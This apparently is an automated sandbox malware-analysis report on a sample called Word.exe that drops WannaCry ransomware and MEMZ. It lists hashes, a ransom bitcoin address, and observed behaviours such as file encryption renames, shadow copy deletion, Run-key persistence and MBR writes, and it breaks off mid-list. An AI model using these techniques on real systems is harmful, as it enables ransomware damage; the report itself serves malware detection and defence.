Analysis
-
max time kernel
572s -
max time network
599s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
16-03-2023 04:27
Static task
static1
Behavioral task
behavioral1
Sample
Word.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Word.exe
Resource
win10v2004-20230220-en
General
-
Target
Word.exe
-
Size
3.6MB
-
MD5
e8340564caba7a2635af2c79cb7103eb
-
SHA1
8c62c79508abe5ffa36608d1846dcb20b2a27137
-
SHA256
acd5f35bfcc91c197d8ea08afe588454233114500255ed842b0589dc194ec466
-
SHA512
b6dc6dfeff210222ee904ad9c8dc832e4bf9c27a84298d2817e320bd9308e6d647a5efcf6845a0ed2b0cebdb6539257cd07428bbdce3d5d5db23e8614503d9d2
-
SSDEEP
98304:/uWtmPx3xiobns6osz1gyQ4BL995Bt9JWpVi6q:/9m5hi0HBtQ4P95L9g3i6q
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\@Please_Read_Me@.txt
wannacry
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 22 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exedescription ioc process File renamed C:\Users\Admin\Pictures\LockGroup.tif.WNCRYT => C:\Users\Admin\Pictures\LockGroup.tif.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created C:\Users\Admin\Pictures\SkipExport.tif.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created C:\Users\Admin\Pictures\SubmitExport.tif.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\CompareCopy.tiff ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRYT => C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRYT => C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created C:\Users\Admin\Pictures\LockGroup.tif.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRYT => C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created C:\Users\Admin\Pictures\InvokeReset.tif.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\InvokeReset.tif.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\LockGroup.tif.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Pictures\SkipExport.tif.WNCRYT => C:\Users\Admin\Pictures\SkipExport.tif.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\SkipExport.tif.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Pictures\SubmitExport.tif.WNCRYT => C:\Users\Admin\Pictures\SubmitExport.tif.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\SubmitExport.tif.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Pictures\InvokeReset.tif.WNCRYT => C:\Users\Admin\Pictures\InvokeReset.tif.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
MEMZ.exeMEMZ.exeWord.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation MEMZ.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation MEMZ.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation Word.exe -
Drops startup file 2 IoCs
Processes:
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDD537.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDD55D.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Executes dropped EXE 64 IoCs
Processes:
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exetaskdl.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exe@WanaDecryptor@.exe@WanaDecryptor@.exetaskhsvc.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskse.exe@WanaDecryptor@.exetaskdl.exe@WanaDecryptor@.exetaskse.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exe@WanaDecryptor@.exetaskse.exetaskdl.exe@WanaDecryptor@.exetaskse.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exe@WanaDecryptor@.exetaskse.exetaskdl.exetaskse.exepid process 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 1464 taskdl.exe 4236 MEMZ.exe 1336 MEMZ.exe 1844 MEMZ.exe 4108 MEMZ.exe 3696 MEMZ.exe 812 MEMZ.exe 4828 MEMZ.exe 2088 @WanaDecryptor@.exe 2500 @WanaDecryptor@.exe 4736 taskhsvc.exe 3348 taskdl.exe 4544 taskse.exe 1284 @WanaDecryptor@.exe 5176 taskdl.exe 1656 taskse.exe 4332 @WanaDecryptor@.exe 3764 taskdl.exe 5180 taskse.exe 2532 @WanaDecryptor@.exe 5988 taskdl.exe 6044 taskse.exe 5012 @WanaDecryptor@.exe 5388 taskse.exe 4256 @WanaDecryptor@.exe 5768 taskdl.exe 4904 @WanaDecryptor@.exe 2628 taskse.exe 2632 taskdl.exe 4020 taskse.exe 6052 @WanaDecryptor@.exe 5988 taskdl.exe 4252 taskse.exe 1468 @WanaDecryptor@.exe 5476 taskdl.exe 5580 taskse.exe 5612 @WanaDecryptor@.exe 2716 taskdl.exe 1736 taskse.exe 2852 @WanaDecryptor@.exe 1636 taskdl.exe 748 taskse.exe 4792 @WanaDecryptor@.exe 1328 taskdl.exe 4972 @WanaDecryptor@.exe 452 taskse.exe 1892 taskdl.exe 4944 @WanaDecryptor@.exe 632 taskse.exe 6032 taskdl.exe 704 taskse.exe 3880 @WanaDecryptor@.exe 5652 taskdl.exe 5868 taskse.exe 5328 @WanaDecryptor@.exe 5928 taskdl.exe 3524 taskse.exe 320 @WanaDecryptor@.exe 1452 taskdl.exe 7084 @WanaDecryptor@.exe 7040 taskse.exe 7048 taskdl.exe 848 taskse.exe -
Loads dropped DLL 8 IoCs
Processes:
taskhsvc.exepid process 4736 taskhsvc.exe 4736 taskhsvc.exe 4736 taskhsvc.exe 4736 taskhsvc.exe 4736 taskhsvc.exe 4736 taskhsvc.exe 4736 taskhsvc.exe 4736 taskhsvc.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 37.123.163.58 -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\qpzmehtw499 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" reg.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
MEMZ.exedescription ioc process File opened for modification \??\PhysicalDrive0 MEMZ.exe -
Drops file in System32 directory 1 IoCs
Processes:
mmc.exedescription ioc process File opened for modification C:\Windows\System32\devmgmt.msc mmc.exe -
Sets desktop wallpaper using registry 2 TTPs 3 IoCs
Processes:
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe@WanaDecryptor@.exe@WanaDecryptor@.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" @WanaDecryptor@.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" @WanaDecryptor@.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\55700faf-e542-4ee0-894d-a72871b5f06c.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230316052823.pma setup.exe -
Drops file in Windows directory 57 IoCs
Processes:
mmc.exedescription ioc process File created C:\Windows\INF\c_fsinfrastructure.PNF mmc.exe File created C:\Windows\INF\c_fscompression.PNF mmc.exe File created C:\Windows\INF\digitalmediadevice.PNF mmc.exe File created C:\Windows\INF\c_fsreplication.PNF mmc.exe File created C:\Windows\INF\c_holographic.PNF mmc.exe File created C:\Windows\INF\rdcameradriver.PNF mmc.exe File created C:\Windows\INF\wsdprint.PNF mmc.exe File created C:\Windows\INF\c_receiptprinter.PNF mmc.exe File created C:\Windows\INF\c_ucm.PNF mmc.exe File created C:\Windows\INF\c_fsvirtualization.PNF mmc.exe File created C:\Windows\INF\c_apo.PNF mmc.exe File created C:\Windows\INF\PerceptionSimulationSixDof.PNF mmc.exe File created C:\Windows\INF\c_volume.PNF mmc.exe File created C:\Windows\INF\c_swcomponent.PNF mmc.exe File created C:\Windows\INF\c_computeaccelerator.PNF mmc.exe File created C:\Windows\INF\c_fscopyprotection.PNF mmc.exe File created C:\Windows\INF\c_fssecurityenhancer.PNF mmc.exe File created C:\Windows\INF\c_magneticstripereader.PNF mmc.exe File created C:\Windows\INF\c_display.PNF mmc.exe File created C:\Windows\INF\c_fsquotamgmt.PNF mmc.exe File created C:\Windows\INF\remoteposdrv.PNF mmc.exe File created C:\Windows\INF\c_extension.PNF mmc.exe File created C:\Windows\INF\dc1-controller.PNF mmc.exe File created C:\Windows\INF\c_processor.PNF mmc.exe File created C:\Windows\INF\c_fsphysicalquotamgmt.PNF mmc.exe File created C:\Windows\INF\c_camera.PNF mmc.exe File created C:\Windows\INF\c_fscfsmetadataserver.PNF mmc.exe File created C:\Windows\INF\miradisp.PNF mmc.exe File created C:\Windows\INF\c_sslaccel.PNF mmc.exe File created C:\Windows\INF\c_media.PNF mmc.exe File created C:\Windows\INF\c_fscontinuousbackup.PNF mmc.exe File created C:\Windows\INF\rawsilo.PNF mmc.exe File created C:\Windows\INF\c_fsopenfilebackup.PNF mmc.exe File created C:\Windows\INF\c_mcx.PNF mmc.exe File created C:\Windows\INF\c_smrdisk.PNF mmc.exe File created C:\Windows\INF\ts_generic.PNF mmc.exe File created C:\Windows\INF\c_firmware.PNF mmc.exe File created C:\Windows\INF\c_scmdisk.PNF mmc.exe File created C:\Windows\INF\c_scmvolume.PNF mmc.exe File created C:\Windows\INF\c_netdriver.PNF mmc.exe File created C:\Windows\INF\c_barcodescanner.PNF mmc.exe File created C:\Windows\INF\c_fsactivitymonitor.PNF mmc.exe File created C:\Windows\INF\c_fshsm.PNF mmc.exe File created C:\Windows\INF\c_smrvolume.PNF mmc.exe File created C:\Windows\INF\c_proximity.PNF mmc.exe File created C:\Windows\INF\c_cashdrawer.PNF mmc.exe File created C:\Windows\INF\c_fscontentscreener.PNF mmc.exe File created C:\Windows\INF\c_fssystem.PNF mmc.exe File created C:\Windows\INF\xusb22.PNF mmc.exe File created C:\Windows\INF\c_fsundelete.PNF mmc.exe File created C:\Windows\INF\c_fssystemrecovery.PNF mmc.exe File created C:\Windows\INF\c_diskdrive.PNF mmc.exe File created C:\Windows\INF\c_monitor.PNF mmc.exe File created C:\Windows\INF\c_fsantivirus.PNF mmc.exe File created C:\Windows\INF\c_linedisplay.PNF mmc.exe File created C:\Windows\INF\oposdrv.PNF mmc.exe File created C:\Windows\INF\c_fsencryption.PNF mmc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 23 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Taskmgr.exemmc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 Taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 mmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 mmc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ mmc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName Taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 mmc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName mmc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName mmc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName mmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A mmc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ mmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom mmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 mmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 mmc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags mmc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName mmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 mmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A mmc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom mmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 mmc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags mmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 mmc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 2 IoCs
Processes:
msedge.exeMEMZ.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings MEMZ.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
MEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exepid process 1336 MEMZ.exe 1336 MEMZ.exe 1844 MEMZ.exe 1844 MEMZ.exe 1336 MEMZ.exe 1336 MEMZ.exe 1336 MEMZ.exe 1336 MEMZ.exe 1844 MEMZ.exe 1844 MEMZ.exe 4108 MEMZ.exe 4108 MEMZ.exe 1844 MEMZ.exe 1844 MEMZ.exe 1336 MEMZ.exe 1336 MEMZ.exe 1844 MEMZ.exe 3696 MEMZ.exe 1844 MEMZ.exe 3696 MEMZ.exe 4108 MEMZ.exe 4108 MEMZ.exe 812 MEMZ.exe 812 MEMZ.exe 1336 MEMZ.exe 1336 MEMZ.exe 3696 MEMZ.exe 3696 MEMZ.exe 4108 MEMZ.exe 4108 MEMZ.exe 1844 MEMZ.exe 1844 MEMZ.exe 812 MEMZ.exe 812 MEMZ.exe 4108 MEMZ.exe 4108 MEMZ.exe 3696 MEMZ.exe 3696 MEMZ.exe 1336 MEMZ.exe 1336 MEMZ.exe 812 MEMZ.exe 812 MEMZ.exe 1844 MEMZ.exe 1844 MEMZ.exe 812 MEMZ.exe 812 MEMZ.exe 1336 MEMZ.exe 1336 MEMZ.exe 3696 MEMZ.exe 3696 MEMZ.exe 4108 MEMZ.exe 4108 MEMZ.exe 1844 MEMZ.exe 1844 MEMZ.exe 3696 MEMZ.exe 3696 MEMZ.exe 1336 MEMZ.exe 1336 MEMZ.exe 812 MEMZ.exe 812 MEMZ.exe 4108 MEMZ.exe 4108 MEMZ.exe 812 MEMZ.exe 812 MEMZ.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Taskmgr.exepid process 5392 Taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 60 IoCs
Processes:
msedge.exepid process 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskse.exeWMIC.exevssvc.exetaskse.exetaskse.exeTaskmgr.exetaskse.exeAUDIODG.EXEtaskse.exetaskse.exetaskse.exedescription pid process Token: SeTcbPrivilege 4544 taskse.exe Token: SeTcbPrivilege 4544 taskse.exe Token: SeIncreaseQuotaPrivilege 320 WMIC.exe Token: SeSecurityPrivilege 320 WMIC.exe Token: SeTakeOwnershipPrivilege 320 WMIC.exe Token: SeLoadDriverPrivilege 320 WMIC.exe Token: SeSystemProfilePrivilege 320 WMIC.exe Token: SeSystemtimePrivilege 320 WMIC.exe Token: SeProfSingleProcessPrivilege 320 WMIC.exe Token: SeIncBasePriorityPrivilege 320 WMIC.exe Token: SeCreatePagefilePrivilege 320 WMIC.exe Token: SeBackupPrivilege 320 WMIC.exe Token: SeRestorePrivilege 320 WMIC.exe Token: SeShutdownPrivilege 320 WMIC.exe Token: SeDebugPrivilege 320 WMIC.exe Token: SeSystemEnvironmentPrivilege 320 WMIC.exe Token: SeRemoteShutdownPrivilege 320 WMIC.exe Token: SeUndockPrivilege 320 WMIC.exe Token: SeManageVolumePrivilege 320 WMIC.exe Token: 33 320 WMIC.exe Token: 34 320 WMIC.exe Token: 35 320 WMIC.exe Token: 36 320 WMIC.exe Token: SeIncreaseQuotaPrivilege 320 WMIC.exe Token: SeSecurityPrivilege 320 WMIC.exe Token: SeTakeOwnershipPrivilege 320 WMIC.exe Token: SeLoadDriverPrivilege 320 WMIC.exe Token: SeSystemProfilePrivilege 320 WMIC.exe Token: SeSystemtimePrivilege 320 WMIC.exe Token: SeProfSingleProcessPrivilege 320 WMIC.exe Token: SeIncBasePriorityPrivilege 320 WMIC.exe Token: SeCreatePagefilePrivilege 320 WMIC.exe Token: SeBackupPrivilege 320 WMIC.exe Token: SeRestorePrivilege 320 WMIC.exe Token: SeShutdownPrivilege 320 WMIC.exe Token: SeDebugPrivilege 320 WMIC.exe Token: SeSystemEnvironmentPrivilege 320 WMIC.exe Token: SeRemoteShutdownPrivilege 320 WMIC.exe Token: SeUndockPrivilege 320 WMIC.exe Token: SeManageVolumePrivilege 320 WMIC.exe Token: 33 320 WMIC.exe Token: 34 320 WMIC.exe Token: 35 320 WMIC.exe Token: 36 320 WMIC.exe Token: SeBackupPrivilege 2312 vssvc.exe Token: SeRestorePrivilege 2312 vssvc.exe Token: SeAuditPrivilege 2312 vssvc.exe Token: SeTcbPrivilege 1656 taskse.exe Token: SeTcbPrivilege 1656 taskse.exe Token: SeTcbPrivilege 5180 taskse.exe Token: SeTcbPrivilege 5180 taskse.exe Token: SeDebugPrivilege 5392 Taskmgr.exe Token: SeSystemProfilePrivilege 5392 Taskmgr.exe Token: SeCreateGlobalPrivilege 5392 Taskmgr.exe Token: SeTcbPrivilege 6044 taskse.exe Token: SeTcbPrivilege 6044 taskse.exe Token: 33 4748 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4748 AUDIODG.EXE Token: SeTcbPrivilege 5388 taskse.exe Token: SeTcbPrivilege 5388 taskse.exe Token: SeTcbPrivilege 2628 taskse.exe Token: SeTcbPrivilege 2628 taskse.exe Token: SeTcbPrivilege 4020 taskse.exe Token: SeTcbPrivilege 4020 taskse.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exeTaskmgr.exepid process 1324 msedge.exe 1324 msedge.exe 1324 msedge.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
